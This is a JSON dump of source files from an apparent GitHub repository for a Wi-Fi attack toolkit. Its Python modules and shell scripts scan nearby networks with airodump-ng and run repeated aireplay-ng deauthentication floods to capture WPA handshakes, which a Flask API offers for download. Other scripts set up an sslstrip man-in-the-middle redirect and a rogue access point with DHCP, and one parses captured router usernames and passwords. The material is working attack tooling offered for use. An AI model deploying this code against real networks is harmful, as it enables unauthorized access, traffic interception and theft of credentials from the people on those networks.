"text": "# coding:utf-8\nconf ={}\nconf['mongohost'] = \"localhost\"\nconf['mongoport'] = 27017\nconf['redishost'] = \"localhost\"\nconf['redisport'] = 6379\nconf['hostapdlog'] = \"/home/hostapd.log\"\nconf['dhcplog'] = \"/home/dhcp.log\"\nconf['terminal'] = \"/home/terminal.log\"\nconf['hostapdconf'] = \"/etc/hostapd/hostapd.conf\"\nconf['hostapdshell'] = \"/home/starthostapd.sh\"\nconf['dhcpshell'] = \"/home/startdhcp.sh\"\nconf['routershell'] = \"/home/startrouter.sh\"\nconf['wifishell'] = \"/home/getallwifi.sh\"\nconf['Jan'] = 1\nconf['Feb'] = 2\nconf['Mar'] = 3\nconf['Apr'] = 4\nconf['May'] = 5\nconf['Jun'] = 6\nconf['Jul'] = 7\nconf['Aug'] = 8\nconf['Sep'] = 9\nconf['Oct'] = 10\nconf['Nov'] = 11\nconf['Dec'] = 12"
},
{
"alpha_fraction": 0.5721295475959778,
"alphanum_fraction": 0.5907752513885498,
"avg_line_length": 22.18181800842285,
"blob_id": "20ee36dd41194a5abc59ffa0f6909a1ab706af43",
"content_id": "2933143b0e4b4fd1d5b60113c79373dfefd6604a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1107,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 44,
"path": "/pubfunc/getrouter.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "\"\"\"\n正则表达式匹配路由器用户名和密码\nby swm 2018/01/05\n\"\"\"\nimport re\nimport datetime\n\n\n# 时间转换str datetime to datetime\ndef str2datetime(strdate):\n dt = datetime.datetime.strptime(strdate, \"%Y-%m-%d %H:%M:%S\")\n return dt\n\n\ndef getrouter(filepath):\n with open(filepath, 'r') as f:\n data = f.read()\n # 匹配dhcp的host\n re_host = re.compile(r'host:\\s([\\d.]+[\\d.]+[\\d.]+[\\d])')\n # 匹配用户名\n re_usr = re.compile(r'login:\\s(\\w+)')\n # 匹配密码\n re_pwd = re.compile(r'password:\\s(\\S+)')\n # 匹配成功的时间\n re_time =re.compile(r'\\d{4}\\-\\d{2}\\-\\d{2}\\s\\d{2}\\:\\d{2}\\:\\d{2}')\n host = re_host.findall(data)\n usr = re_usr.findall(data)\n pwd = re_pwd.findall(data)\n time = re_time.findall(data)\n # 转换为datetime格式\n starttime = str2datetime(time[0])\n endtime = str2datetime(time[1])\n print(data)\n print(host)\n print(usr)\n print(pwd)\n print(time)\n print(starttime, type(starttime))\n print(endtime, type(endtime))\n\n\nif __name__ == '__main__':\n filepath = 'router.txt'\n getrouter(filepath)"
},
{
"alpha_fraction": 0.655063271522522,
"alphanum_fraction": 0.6645569801330566,
"avg_line_length": 27.044445037841797,
"blob_id": "1b1f1b2e726249b805062432184cc8d42a394de3",
"content_id": "1db09354a4da2468accd0faa42d97ec0b036317f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1320,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 45,
"path": "/terminal/mongooptions.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\nmongodb options\ncreate by swm\n2018/1/15\n\"\"\"\nimport pymongo\nimport datetime\nfrom terminal.allconfig import conf\n\n\n# 将tshark获取的数据存入mongodb\ndef insertintoterminal(terminal):\n client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])\n db = client.swmdb\n information = db.terminal\n information.insert(terminal)\n print datetime.datetime.now(), 'insert terminal success'\n\n\n# 后面再增加其他方法\ndef insertmoibiinfo(mobi):\n client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])\n db = client.swmdb\n information = db.mobi\n information.insert(mobi)\n # print datetime.datetime.now(), 'insert mobi success'\n return\n\n\n# 查询手机信息\ndef mobidata():\n res = []\n client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])\n db = client.swmdb\n mobi = db.mobi\n # 1升序,-1降序\n cursor = mobi.find({}, {\"_id\": 0}).sort(\"offlinetime\", -1)\n for el in cursor:\n online = datetime.datetime.fromtimestamp(int(el['onlinetime'])).strftime('%Y-%m-%d %H:%M:%S')\n offline = datetime.datetime.fromtimestamp(int(el['offlinetime'])).strftime('%Y-%m-%d %H:%M:%S')\n el['onlinetime'] = online\n el['offlinetime'] = offline\n res.append(el)\n return res\n\n\n"
},
{
"alpha_fraction": 0.5657492280006409,
"alphanum_fraction": 0.5703364014625549,
"avg_line_length": 28.20535659790039,
"blob_id": "7a12b638b4574c504da24f4b4d2433a7484bcea9",
"content_id": "ab847772c44a61d82d6a1c749055e9bc3862458b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3288,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 112,
"path": "/terminal/getallwifiname.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n使用iwconfig获取插入的网卡\ncreate by swm\n2018/03/07\n\"\"\"\nimport re\nfrom subprocess import Popen, PIPE\n\nfrom terminal.allconfig import conf\n\n\nclass IWWIFI:\n\n def __init__(self):\n self.shell = 'iwconfig'\n self.hostapdconf = conf['hostapdconf']\n self.dhcpsh = conf['dhcpshell']\n self.wifishell = conf['wifishell']\n\n def getallname(self):\n p = Popen('iwconfig', stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n re_wlanname = re.compile(r'wlan\\d')\n wlanname = re_wlanname.findall(out)\n return wlanname\n\n def changehostapdconf(self, wlanname):\n oldf = open(self.hostapdconf, 'r')\n oldsrc = oldf.read()\n re_wlanname = re.compile(r'wlan\\d')\n newsrc = re_wlanname.sub(r'{}'.format(wlanname), oldsrc)\n oldf.close()\n wopen = open(self.hostapdconf, 'w')\n wopen.write(newsrc)\n wopen.close()\n return\n\n def changedhcpconf(self, wlanname):\n oldf = open(self.dhcpsh, 'r')\n oldsrc = oldf.read()\n re_wlanname = re.compile(r'wlan\\d')\n newsrc = re_wlanname.sub(r'{}'.format(wlanname), oldsrc)\n oldf.close()\n wopen = open(self.dhcpsh, 'w')\n wopen.write(newsrc)\n wopen.close()\n return\n\n def changwifishell(self, wlanname):\n oldf = open(self.wifishell, 'r')\n oldsrc = oldf.read()\n re_wlanname = re.compile(r'wlan\\d')\n newsrc = re_wlanname.sub(r'{}'.format(wlanname), oldsrc)\n oldf.close()\n wopen = open(self.wifishell, 'w')\n wopen.write(newsrc)\n wopen.close()\n return\n\n def rename(self, wlanname):\n self.changehostapdconf(wlanname)\n self.changedhcpconf(wlanname)\n return\n\n def changewificonf(self, name, pwd):\n oldf = open(self.hostapdconf, 'r')\n oldsrc = oldf.read()\n re_name = re.compile(r'\\bssid\\=.+')\n re_pwd = re.compile(r'wpa\\_passphrase\\=.+')\n name = re_name.sub(r'ssid={}'.format(name), oldsrc)\n pwd = re_pwd.sub(r'wpa_passphrase={}'.format(pwd), name)\n oldf.close()\n wopen = open(self.hostapdconf, 'w')\n wopen.write(pwd)\n wopen.close()\n return\n\n\n# if __name__ == '__main__':\n # iw = IWWIFI()\n # iw.changewificonf('swm', '454545sw')\n # import os\n # file = os.path.dirname(os.path.realpath(__file__))\n # hostconf = os.path.join(file, '..', 'script', 'hostapd.conf')\n # # # print hostconf\n # src = open(hostconf, 'r')\n # content = src.read()\n # re_name = re.compile(r'\\bssid\\=(.+)')\n # wifiname = re_name.findall(content)\n # print wifiname\n # re_name = re.compile(r'\\bssid\\=.+')\n # re_pwd = re.compile(r'wpa\\_passphrase\\=.+')\n # name = re_name.sub(r'ssid=swm', content)\n # pwd = re_pwd.sub(r'wpa_passphrase=1234987', name)\n # print name\n # print pwd\n # src.close()\n # wopen = open(hostconf, 'w')\n # wopen.write(pwd)\n # wopen.close()\n # for line in content:\n # name = re_name.search(content)\n # pwd = re_pwd.search(content)\n # if name:\n # print name.group()\n # if pwd:\n # print pwd.group()\n # name = re_name.findall(content)\n # pwd = re_pwd.findall(content)\n # print name\n # print pwd"
},
{
"alpha_fraction": 0.489130437374115,
"alphanum_fraction": 0.717391312122345,
"avg_line_length": 44.75,
"blob_id": "304cc63cb8e0c660d11f91ac9caebd1405912fef",
"content_id": "56642114372d4ed2147d044d1e91750de04ca208",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 4,
"path": "/shelldic/startdhcp.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan0 10.0.0.1 netmask 255.255.255.0\nifconfig wlan0 mtu 1500\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\ndhcpd -d -f -cf /etc/dhcp/dhcpd.conf wlan0 &> dhcp.log\n\n"
},
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.6785714030265808,
"avg_line_length": 13.5,
"blob_id": "8fe8e9d24a460ae54281c8ce6664a3cb25143266",
"content_id": "0233cc18daa8409bff023e3d78ac6036ef80e8f2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 28,
"license_type": "permissive",
"max_line_length": 14,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "pymongo==3.6.0\nredis==2.10.6"
},
{
"alpha_fraction": 0.5069904327392578,
"alphanum_fraction": 0.5154525637626648,
"avg_line_length": 27.9255313873291,
"blob_id": "41a64b1f6aacca06207cbcaeca359b709fc49a3e",
"content_id": "6e75629d72f02baecbc5143b84de96753302da37",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2832,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 94,
"path": "/wifilist/getwifilist.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n获取wifi list\n存入mongodb\ncreate by swm\n2018/1/23\n\"\"\"\n\nimport re\nimport pymongo\nimport datetime\nimport time\nfrom subprocess import call\n# 外部引用\n\n\nclass WIFINAME:\n\n def __init__(self):\n self.logpath = \"/home/execute.log\"\n self.mongohost = \"localhost\"\n self.mongoport = 27017\n\n def insertintomongo(self, wifilist):\n try:\n client = pymongo.MongoClient(self.mongohost, self.mongoport)\n except:\n self.writelog('{} canot connect mongodb'.format(datetime.datetime.now()))\n db = client.swmdb\n information = db.wifilist\n try:\n information.insert(wifilist)\n except:\n wifilist['ESSID'] = 'errorcode'\n information.insert(wifilist)\n self.writelog(\"{} error code, have replace\".format(datetime.datetime.now()))\n return\n\n def writelog(self, log):\n with open(self.logpath, \"a\") as file:\n file.write(log)\n file.close()\n\n def getwifilist(self, text):\n wifilist = []\n re_start = re.compile(r'BSSID\\s+STATION\\s+PWR\\s+Rate\\s+Lost\\s+Frames\\s+Probe')\n re_end = re.compile(r'BSSID\\s+PWR\\s+Beacons\\s+\\#Data\\, \\#\\/s\\s+CH\\s+MB\\s+ENC\\s+CIPHER AUTH ESSID')\n copy = False\n # 倒着读字符串,找到符合条件的行加入列表然后再筛选\n for line in reversed(text.splitlines()):\n start = re_start.search(line)\n end = re_end.search(line)\n if start:\n copy = True\n continue\n elif end:\n copy = False\n if len(wifilist) > 0:\n break\n elif copy:\n wifilist.append(line)\n # 将信息采集后就可以删除log,不在需要log\n # call(\"rm -f {}\".format(self.logpath), shell=True)\n return wifilist\n\n def startcollectinfo(self, wifilist):\n for line in wifilist:\n # 空格分割\n str = line.split(' ')\n # 去除空字符串\n list = filter(None, str)\n if len(list) <= 1:\n continue\n else:\n tmp = {}\n tmp['BSSID'] = list[0]\n tmp['PWR'] = list[1]\n tmp['Beacons'] = list[2]\n tmp['Data'] = list[3]\n tmp['s'] = list[4]\n tmp['CH'] = list[5]\n tmp['MB'] = list[6]\n tmp['unixtime'] = int(time.time())\n tmp['ESSID'] = list[-1]\n self.insertintomongo(tmp)\n self.writelog(\"{} Complete store the info.\".format(datetime.datetime.now()))\n return\n\n\n# if __name__ == '__main__':\n# wifi = WIFINAME()\n# wifilist = wifi.getwifilist()\n# # print wifilist\n# wifi.startcollectinfo(wifilist)"
},
{
"alpha_fraction": 0.67136150598526,
"alphanum_fraction": 0.7417840361595154,
"avg_line_length": 52.25,
"blob_id": "98e8528eabeb068c86409db02e85de46536f4c6c",
"content_id": "2c95c5de23750389c10c9160934bade362d8cd4a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 213,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 4,
"path": "/shelldic/startsslstrip.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "iptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE\necho \"1\" > /proc/sys/net/ipv4/ip_forward\niptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000\nsslstrip -l 10000\n"
},
{
"alpha_fraction": 0.48255813121795654,
"alphanum_fraction": 0.7267441749572754,
"avg_line_length": 41.75,
"blob_id": "5ae5b4b9df69507adf470918dfb6058d9e30afb2",
"content_id": "981e23ea0bd2adb356c0d618a7c6ae7233322038",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 172,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 4,
"path": "/homebak/startdhcp.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan1 10.0.0.1 netmask 255.255.255.0\nifconfig wlan1 mtu 1500\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\ndhcpd -d -f -cf /etc/dhcp/dhcpd.conf wlan1 \n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7452830076217651,
"avg_line_length": 52,
"blob_id": "09906d1f230503b4b722e1662db166b1483d408c",
"content_id": "5c40cc280bfcaf4cd50bd6c52336913ae71654c0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 2,
"path": "/homebak/startrouter.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "iptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE\necho \"1\" >/proc/sys/net/ipv4/ip_forward\n"
},
{
"alpha_fraction": 0.558613657951355,
"alphanum_fraction": 0.5840978622436523,
"avg_line_length": 27,
"blob_id": "e96ece26b13a6a9d0738bbb8b4f4935b5c4000a4",
"content_id": "17d4fb6a60c8072e166ddad8a82afde927c949f8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 35,
"path": "/wifilist/mongoquery.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\nget the mongodata\ncreate by swm\n2018/02/26\n\"\"\"\nimport pymongo\nimport datetime\nimport time\nimport json\n\n\ndef getquerydate():\n # today\n today = time.mktime(datetime.date.today().timetuple())\n res = []\n client = pymongo.MongoClient(host=\"localhost\", port=27017)\n db = client.swmdb\n collection = db.wifilist\n # cursor = collection.find({\"unixtime\": {\"$gt\": int(today)}}, {\"_id\": 0}).sort({\"unixtime\": -1})\n # cursor = collection.find({\"unixtime\": {\"$lte\": int(today)}}, {\"_id\": 0}).sort([(\"unixtime\", -1)])\n cursor = collection.find({}, {\"_id\": 0}).sort([(\"unixtime\", -1)])\n count = 0\n for el in cursor:\n havedate = datetime.datetime.fromtimestamp(int(el['unixtime'])).strftime('%Y-%m-%d %H:%M:%S')\n el['unixtime'] = havedate\n res.append(el)\n count += 1\n if count > 100:\n break\n jsondata = json.dumps(res)\n return jsondata\n\n# if __name__ == '__main__':\n# print getquerydate()\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.796875,
"avg_line_length": 20,
"blob_id": "ceed98a952c7a396ac5fadc53334a7075faf28d9",
"content_id": "26db422d30348dfb07a67d294252876a70740b9e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 3,
"path": "/shelldic/getallwifi.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan0 up \nairmon-ng start wlan0 \nairodump-ng wlan0mon \n"
},
{
"alpha_fraction": 0.7558139562606812,
"alphanum_fraction": 0.7906976938247681,
"avg_line_length": 20,
"blob_id": "f1de678c38e1bfc87b90e9f15a9b8af5141ddb85",
"content_id": "46fb7da5a11310f6a62e816bb78f345999b832d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 86,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 4,
"path": "/homebak/getallwifi.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan1 up \nairmon-ng check kill\nairmon-ng start wlan1 \nairodump-ng wlan1mon \n\n"
},
{
"alpha_fraction": 0.6489419341087341,
"alphanum_fraction": 0.6576234698295593,
"avg_line_length": 31.060869216918945,
"blob_id": "f4e5cafc2841b543fb745c530150176a193b6b8f",
"content_id": "7570a75ef4af8ea1b241d265d88c0c78315a9069",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3748,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 115,
"path": "/app.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport threading\nfrom flask import Flask, request, Response, send_from_directory, make_response\nimport json\nimport gevent.monkey\nfrom gevent.pywsgi import WSGIServer\nimport redis\ngevent.monkey.patch_all()\n# 内部引用\nfrom wifilist.startwifiserver import CONTROL\nfrom wifilist.getwifihandshake import HANDSHAKE\nfrom wifilist.routeattack import ROUTE\nfrom terminal.getallwifiname import IWWIFI\nfrom wifilist.wifiswitch import SWITCH\napp = Flask(__name__)\n\n\n# @app.route('/')\n# def root():\n# return render_template('index.html')\n\n\n# @app.route('/<string:page_name>/')\n# def analyse(page_name):\n# return render_template(page_name)\n\n\n# @app.route('/api/mongodata', methods=['get'])\n# def sendmongodata():\n# responsedata = getquerydate()\n# return Response(responsedata, mimetype=\"application/json\")\n# 选择哪张wifi去运行wifi扫描\[email protected]('/api/whichwlan', methods=['post'])\ndef choosewlan():\n args = json.loads(request.data)\n wlan = args['wlanname']\n iw = IWWIFI()\n iw.changwifishell(wlan)\n info = {\"changed\": 1}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/startcollect', methods=['post'])\ndef starttheserver():\n # 搜集并存储扫描的wifi信息\n args = json.loads(request.data)\n # 类型强转确保int\n seconds = int(args['seconds'])\n if int(args['start']) == 1:\n control = CONTROL(seconds)\n thread1 = threading.Thread(target=control.start)\n thread2 = threading.Thread(target=control.killshell)\n thread1.start()\n thread2.start()\n thread1.join()\n thread2.join()\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"something wrong with you!\"}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/handshake', methods=['post'])\ndef collecthandshake():\n args = json.loads(request.data)\n handshake = HANDSHAKE(args['mac'], int(args['ch']), args['wifi'], args['wlanname'])\n router = ROUTE(args['mac'], args['wlanname'], args['ch'])\n t1 = threading.Thread(target=handshake.starthandshake)\n t2 = threading.Thread(target=router.start)\n t1.start()\n t2.start()\n t2.join()\n t1.join()\n from terminal.allconfig import conf\n r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n get = r.hget(\"handshake\", \"GET\")\n if int(get) == 1:\n handshake.mvfile()\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"Failed get wifi handshake\"}\n r.delete(\"handshake\")\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/download/<wifi>', methods=['GET'])\ndef download(wifi):\n filepath = '/home/wifihandshakedata/'\n filename = '{}-01.cap'.format(wifi)\n # 中文\n response = make_response(send_from_directory(directory=filepath, filename=filename, as_attachment=True))\n # except:\n # info = {\"complete\": 0, \"error\": \"No such file, scan wifi failed\"}\n # return Response(json.dumps(info), mimetype=\"application/json\")\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1'))\n return response\n\n\[email protected]('/api/shutdown', methods=['post'])\ndef shutdownwifi():\n args = json.loads(request.data)\n wlanname = args['wlanname']\n switch = SWITCH()\n info = switch.stopwifi(wlanname)\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\nif __name__ == '__main__':\n http_server = WSGIServer(('0.0.0.0', 8014), app)\n try:\n print(\"Start at \" + http_server.server_host +\n ':' + str(http_server.server_port))\n http_server.serve_forever()\n except(KeyboardInterrupt):\n print('Exit...')"
},
{
"alpha_fraction": 0.8072289228439331,
"alphanum_fraction": 0.8192771077156067,
"avg_line_length": 19.75,
"blob_id": "e478947702bcd3385025ac58b17c0ec4a1027a45",
"content_id": "a4f86aeda4f515abe950d56885f5a9fe6e117a40",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 83,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 4,
"path": "/homebak/starthostapd.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "rfkill unblock wlan\nnmcli radio wifi off\nsleep 2\nhostapd /etc/hostapd/hostapd.conf\n"
},
{
"alpha_fraction": 0.8157894611358643,
"alphanum_fraction": 0.8157894611358643,
"avg_line_length": 24.66666603088379,
"blob_id": "fa46c03d76fb05f3e283d41cd1d666ef3a9c99f7",
"content_id": "e73ae71426c834eaa9e066b904fd7c256c47f02f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 76,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 3,
"path": "/script/starthostapd.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "nmcli radio wifi off \nrfkill unblock wlan \nhostapd /etc/hostapd/hostapd.conf"
},
{
"alpha_fraction": 0.5540962815284729,
"alphanum_fraction": 0.5641025900840759,
"avg_line_length": 28.629629135131836,
"blob_id": "92573fd1ae65ccf5c7f83384eeb01f6296861ad3",
"content_id": "a0f9c4e7d11737d2464076dab381ef5f1b870286",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1747,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 54,
"path": "/wifilist/routeattack.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport os\nimport subprocess\nimport re\nimport time\n\"\"\"\n不断执行route攻击,搜集握手包\n\"\"\"\nfiledir = os.path.dirname(os.path.realpath(__file__))\n\n\nclass ROUTE:\n\n def __init__(self, mac, wlanname, ch):\n # self.routeattack = os.path.join(filedir, 'routrattack', 'routeattack.log')\n self.logpath = \"/home/execute.log\"\n self.mac = mac\n self.limit = 5\n self.wlanname = wlanname\n self.ch = ch\n\n # 保存shell的所有输出\n def writeinfotolog(self):\n # 改变网卡的信道,使网卡适应目标wifi的信道\n iwcmd = 'iwconfig {}mon channel {}'.format(self.wlanname, self.ch)\n subprocess.call(iwcmd, shell=True)\n cmd = 'aireplay-ng -0 10 -a {} {}mon'.format(self.mac, self.wlanname)\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n return output\n\n def killairodump(self):\n subprocess.call(\"ps -ef|grep airodump-ng|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n return\n\n def start(self):\n count = 0\n re_route = re.compile(r'Sending DeAuth to broadcast \\-\\- BSSID\\: \\[{}\\]'.format(self.mac))\n while True:\n # 防止主程序结束后还在自己运行\n if count > self.limit:\n break\n count += 1\n strtext = self.writeinfotolog()\n router = re_route.search(strtext)\n # 泛洪攻击没有成功则停0.5s继续\n if router:\n time.sleep(0.2)\n else:\n # 泛洪攻击成功后停止程序\n time.sleep(2)\n break\n self.killairodump()\n return"
},
{
"alpha_fraction": 0.5890411138534546,
"alphanum_fraction": 0.7123287916183472,
"avg_line_length": 9.571428298950195,
"blob_id": "53f50b94ceb8bc3e7c7b0304d67a39d03cb02e31",
"content_id": "e4d8935c322914492825ff74925147cf1265e5c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 105,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 7,
"path": "/attack/__init__.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n攻击目标wifi,并且伪造一个完全相似的wifi\ncreate by swm\n2018/03/23\n\"\"\""
},
{
"alpha_fraction": 0.5719424486160278,
"alphanum_fraction": 0.7338129281997681,
"avg_line_length": 45.33333206176758,
"blob_id": "65c92957fc17e14d3024a1328b3e65b042bf7d52",
"content_id": "1ec991b171e82ad59c294136b276162285a99d6d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 278,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 6,
"path": "/script/startdhcp.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan1 10.0.0.1 netmask 255.255.255.0\nifconfig wlan1 mtu 1500\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\ndhcpd -d -f -cf /etc/dhcp/dhcpd.conf wlan1\niptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE\necho \"1\" > /proc/sys/net/ipv4/ip_forward\n"
},
{
"alpha_fraction": 0.7706422209739685,
"alphanum_fraction": 0.8073394298553467,
"avg_line_length": 20.799999237060547,
"blob_id": "16435ec3eaa0860fc77a75b14594c0e356014ee9",
"content_id": "b07e8198eb14ca007f69b771300f98e170e7267e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 5,
"path": "/script/getallwifi.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan0 up \nairmon-ng check kill\nairmon-ng start wlan0 \nairodump-ng wlan0mon \nairmon-ng stop wlan0mon\n"
},
{
"alpha_fraction": 0.6047985553741455,
"alphanum_fraction": 0.6147578358650208,
"avg_line_length": 29.66666603088379,
"blob_id": "6e400a67fb0a7401c1d57a7d8a955077f949588c",
"content_id": "d99eeee547f3bb168888bd6d5b51164921f7f5c6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2485,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 72,
"path": "/wifilist/startwifiserver.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport os\nfrom subprocess import call, Popen, PIPE\nimport time\nimport datetime\n\"\"\"\n控制扫描wifi的server服务\n执行shell脚本,kill shell,\n执行python脚本,kill py 和log\ncreate by swm 2018/01/24\n不再需要操作文件\nmodify by swm 2018/2/2\n\"\"\"\nfileDir = os.path.dirname(os.path.realpath(__file__))\n\n\nclass CONTROL:\n\n def __init__(self, seconds):\n # self.pypath = os.path.join(fileDir, 'getwifilist.py')\n self.logpath = \"/home/execute.log\"\n self.shellpath = \"/home/getallwifi.sh\"\n self.seconds = seconds\n\n # 运行python脚本抓取数据\n def collectwifilist(self, text):\n from getwifilist import WIFINAME\n wifi = WIFINAME()\n # 匹配wifi信息\n wifilist = wifi.getwifilist(text)\n # print wifilist\n # 存储已经筛选的日志信息\n wifi.startcollectinfo(wifilist)\n return\n # call(\"python {}\".format(self.pypath), shell=True)\n\n # 保存shell的所有输出\n def writeinfotolog(self):\n # call(\"python {} 2>&1 | tail -1 >{}\".format(self.infopath, self.logpath), shell=True)\n # fdout = open(self.logpath, 'a')\n # fderr = open(self.logpath, 'a')\n # 修改为不写入文件对于不是很大的字符串直接存储在内存\n p = Popen(self.shellpath, stderr=PIPE, stdout=PIPE, shell=True)\n stdout, err = p.communicate()\n return err\n\n # kill shell\n def killshell(self):\n time.sleep(self.seconds)\n call(\"ps -ef|grep airodump-ng|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n return\n\n def writelog(self, log):\n with open(self.logpath, \"a\") as file:\n file.write(log)\n file.close()\n return\n\n # 程序运行入口\n def start(self):\n self.writelog(\"{} Start scan the wifi, wait {}s\".format(datetime.datetime.now(), self.seconds))\n # 在写文件前先清除下可能存在的log\n # call(\"rm -f {}\".format(self.logpath), shell=True)\n try:\n text = self.writeinfotolog()\n except:\n log = \"{} Wifi failed to start properly, please check whether to open wlan\".format(datetime.datetime.now())\n self.writelog(log)\n # 这是非常奇怪的额,明明在写的时候不能执行下一步,但是这个确实能往后面执行\n self.writelog(\"{} Start insert to 